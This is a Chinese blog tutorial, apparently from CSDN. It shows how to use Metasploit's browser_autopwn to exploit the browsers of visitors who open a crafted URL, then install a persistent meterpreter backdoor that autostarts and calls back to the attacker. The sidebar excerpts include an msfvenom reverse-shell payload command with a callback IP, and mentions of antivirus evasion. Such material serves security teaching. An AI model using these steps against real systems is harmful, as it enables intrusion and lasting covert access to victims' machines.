MSF自动化浏览器攻击与后门安装

最新推荐文章于 2024-08-16 18:08:04 发布
最新推荐文章于 2024-08-16 18:08:04 发布
阅读量4.5k 收藏 11
点赞数 1
分类专栏: 渗透相关 文章标签: 浏览器攻击 kali 后门安装
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Sufeiboy/article/details/57407019
版权

0x01:自动化浏览器攻击介绍:

browser_autopwnMetasploit提供的辅助功能模块。在用户访问Web页面时,它会自动攻击受害者的浏览器。在开始攻击之前,browser_autopwn能够检测用户使用的浏览器类型, browser_autopwn将根据浏览器的检测结果,自行部署最合适的exploit

 

0x02:首先进入metasploit,然后搜索该模块,如图1-11-2.

 

1-1.

 

1-2.

0x03:选择第二个模块,经过测试发现第一个模块的exploit比第二个的要少很多,选择之后查看配置选项,如图1-3.

 

1-3.

0x04:设置配置选项,注意SRVHOST代表回连IP,设置为自己的,URIPATH代表路径设置,这个设置为Auto(自动),如图1-4.

 

1-4.

0x05:稍等片刻后会得到一个自动化攻击的URL,只要对方打开了这个URL,模块就会检测这个浏览器的类型以及版本,使用的操作系统,然后根据这些信息进一步去匹配漏洞,发现漏洞后会自动进行攻击,成功后返回一个meterpreter.

 

1-5.

 

1-6.

 

1-7.

0x06:现在开始安装后门.

 

1-8.

-i 重连时间隔间(秒)

-r 设置回连的ip,设为自己(攻击方)的

-p 设置回连的端口

-X 开机自动启动

-h 查看详细帮助信息.

 

0x07:开启监听模块并设置攻击载荷,LPORT必须要与安装后门时设置的回连端口相同.

 

1-9.

End:目标机重启后自动连接.

 

1-10.

其实后门的原理很简单,攻击者在得到meterpreter后创建了一个恶意启动项并写入了注册表,通过msconfig可以查看,然后通过netstat  -an查看当前的TCP连接.

 

1-11.

 

1-12.

看完后,你还会为了所谓的运行速度而裸奔吗?

summe_blue
关注
专栏目录
mysql msf攻击_Metasploit自动攻击和选择模块攻击详解
weixin_28994935的博客
02-07 733
Metasploit自动攻击和选择模块攻击详解Author:魔术@Freebuf.com0x1自动攻击终端启动Metasploit,因为我现在SourceCode,所以这样启动!连接数据库安装方法,执行以下命令即可(请用ROOT执行)。deb http://ubuntu.mirror.cambrium.nl/ubuntu/ precise main universe ...
MSF(Metasploit Framework)框架详解
Hi~ 土拨鼠
12-29 8765
文章目录Metasploit 简介诞生与发展技术架构辅助模块渗透攻击模块攻击载荷模块空指令模块编码器模块后渗透攻击模块免杀模块为什么使用Metasploit?情报搜集阶段威胁建模阶段漏洞分析阶段后渗透攻击阶段报告生成阶段Metasploit 的使用启动MSF情报搜集网站敏感目录扫描主机发现端口扫描探测服务详细信息服务查点telnet服务查点ssh服务查点mssql服务查点口令猜解telnet服务口令猜解ssh服务口令猜解mssql服务破解网络服务渗透攻击ms17-010 “永恒之蓝”meterpreter基
msf5 自动攻击模块 db_autopwn
07-10
msf5 自动攻击模块 db_autopwn msf5 自动攻击模块 db_autopwn
XSS-跨站脚本攻击
最新发布
qq_64177395的博客
08-16 3073
跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets )的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往web页面里插入恶意script代码,当用户浏览该页时,嵌入其中web里面的script代码会被执行,从而达到恶意攻击用户的目的1.2 XSS类型反射型也称为非持久型,这种类型的脚本是最常见的,也是使用最为广泛的一种,主要用于将恶意的脚本附加到URL地址的参数中。
MSF:Web 后门
weixin_46104215的博客
11-21 1939
Web 后门泛指 WebShell,其实就是一段网页代码,包括 ASP、ASP.NET、PHP、JSP代码等。由于这些代码都运行在服务器,攻击者通过这段精心设计的代码,在服务器端进行一些危险的操作获得某些敏感的技术信息,或者通过渗透操作提权,从而获得服务器的控制权。(更具隐蔽性) Web 后门能提供非常多的功能,如执行命令、浏览文案、辅助提权、执行SQL语句、反弹Shell 等。 Windows 系统下比较出名的莫过于 “中国菜刀”,还有很多替代“中国菜刀”的跨平台开源工具...
MSF生成后门(制作各种shellcode攻击)
tmzy1的博客
03-09 944
msfpayload,msfencode的结合体,可利用msfvenom生成后门(木马)程序,并在目标机上执行,在本地监听上线。进入msf命令:msconsole再执行msfvenom -h可得到命令帮助。
metasploit 自动攻击
ytfhjhv的博客
11-15 358
metasploit 自动攻击
MSF恶意程序利用+CS上线
dream2662583的博客
10-19 413
我是dream,我在新课程培训学习网安方面的知识,下面是关于msf恶意程序利用以及CS的内容。
渗透测试 ( 3 ) --- Metasploit Framework ( MSF )
墨鱼菜鸡
07-11 4568
白嫖 Metasploit Pro 2022:https://zhuanlan.zhihu.com/p/449836479 白嫖 Metasploit Pro 2022:http://t.zoukankan.com/hxlinux-p-15787814.html 好东西之 metasploit pro:https://www.52pojie.cn/thr...
网络对抗技术 20181314 Exp6 MSF基础应用
weixin_46014245的博客
04-26 444
一、原理与实践说明 1.实践原理 2.实践内容概述 3.基础问题回答 二、攻击过程记录 任务一:主动攻击的实践 ms08_067_netapi:自动化漏洞溢出攻击 任务二:攻击浏览器的实践 ms07-017 ms11-050 任务三:攻击客户端的实践 Adobe ms10_046 任务四:成功应用任何一个辅助模块 在ms08_067中应用use auxiliary/scanner/portscan/tcp搜索靶机开放端口 加分项:测试2019年以后的漏洞 三、实验遇到的问题及解决方法 四、离实战还缺些什么技
kaliMSF笔记
fhl5203的博客
11-01 1511
metasploit framework 基本使用 msfconsole使用接口 最流行的用户接口 几乎可以使用全部MSF功能 控制台命令支持TAB自动补齐 支持外部命令的执行(系统命令等) 点击鼠标启动 或 msfconsole -h帮助 -q不看banner -r -v版本信息 help / ? / help vulns MSF控制台命令 Banner、Color connect 类似nc s...
msf后门种植
weixin_45605313的博客
07-10 479
Meterpreter后门MetsvcPersistenceNC Metsvc 无认证,固定31337端口 -A :自动启动匹配的利用漏洞/多个/处理程序以连接到服务 -r:卸载现有的MeterMeter服务(必须手动删除文件) Persistence 通过启动项启动,定期连接,系统启动时回连,自动运行 -A:自动启动匹配的利用漏洞/多个/处理程序以连接到代理 -S:作为服务启动时自动启动代理(具有系统权限) -U:当用户登录时自动启动代理 -L:目标主机中要向其写入负载的位置,如果没有,将使用
MSF生成后门汇总
干铮的博客
10-10 4857
可执行脚本反弹shell 1.windows下exe执行文件后门 msfvenom -p windows/meterpreter/reverse_tcp LHOST=监听端ip地址 LPORT=监听端端口 x >文件路径/文件名 案例:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.193 LPORT=4444 x >/shell.exe 监听设置: msfconsole use exploit/mul...
MSF给正常程序添加后门
永远是少年
06-10 1624
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF给正常程序添加后门。 一、后门制作 二、监听开启 三、效果检验 (一)软件查杀测评 (二)软件效果检验
Metasploit自动化攻击——装X必备
渗透测试
06-04 1309
Metasploit自动化攻击——装X必备 (1)首先进行一次普通渗透 msf6 > search ms08_067 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- -----
MSF后门生成及免杀思想
qq_68233961的博客
11-14 1295
MSF后门生成及免杀思想
msf生成免杀木马
qq_56426046的博客
09-08 5793
1.修改特征码免杀的最基本思想就是破坏特征,这个特征有可能是特征码,有可能是行为特征,只要破坏了病毒与木马所固有的特征,并保证其原有功能没有改变,一次免杀就能完成了。(特征码:能识别一个程序是病毒的一段不大于64字节的特征串)就目前的反病毒技术来讲,更改特征码从而达到免杀的效果事实上包含着两种方式。一种是改特征码,这也是免杀的最初方法。例如一个文件在某一个地址内有“灰鸽子上线成功!”这么一句话,表明它就是木马,只要将相应地址内的那句话改成别的就可以了,如果是无关痛痒的,直接将其删掉也未尝不可。
BeEF+msf对用户浏览器攻击测试
liveJQ
02-08 2471
什么是BeEF? BeEF是The Browser Exploitation Framework的缩写,用Ruby语言开发的,Kali中默认安装的一个模块,用于实现对XSS漏洞的攻击和利用。它是一种专注于Web浏览器的渗透测试工具。 随着对包括移动客户端在内的客户网络攻击的担忧日益增加,BeEF允许专业渗透测试人员使用客户端攻击媒介来评估目标环境的实际安全状况。与其他安全框架不同,BeEF超越了强...
实用教程:手动安卓应用中注入msf后门
weixin_34221036的博客
09-14 2687
本文讲的是实用教程:手动安卓应用中注入msf后门,在移动安全评估中,我们尝试将一些常用的应用程序加载上后门,并且加上后门之后应用程序毫无异常。这就可以用来证明如果使用的应用程序被种上后门,使用者会毫无知觉。 步骤一:生成攻击载荷 metasploit中的msfvenom可以生成多种类型的攻击载荷,当然我们也可以使用它来生成一个包含msf后门的apk。...
使用Armitage与MSF进行自动化渗透测试教程
"E023-渗透测试常用工具-使用Armitage的MSF进行自动化集成渗透测试" 渗透测试是网络安全评估的重要组成部分,它模拟黑客攻击行为来检测系统漏洞和安全弱点。在这个课程中,重点讲解了如何利用Armitage工具结合...
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值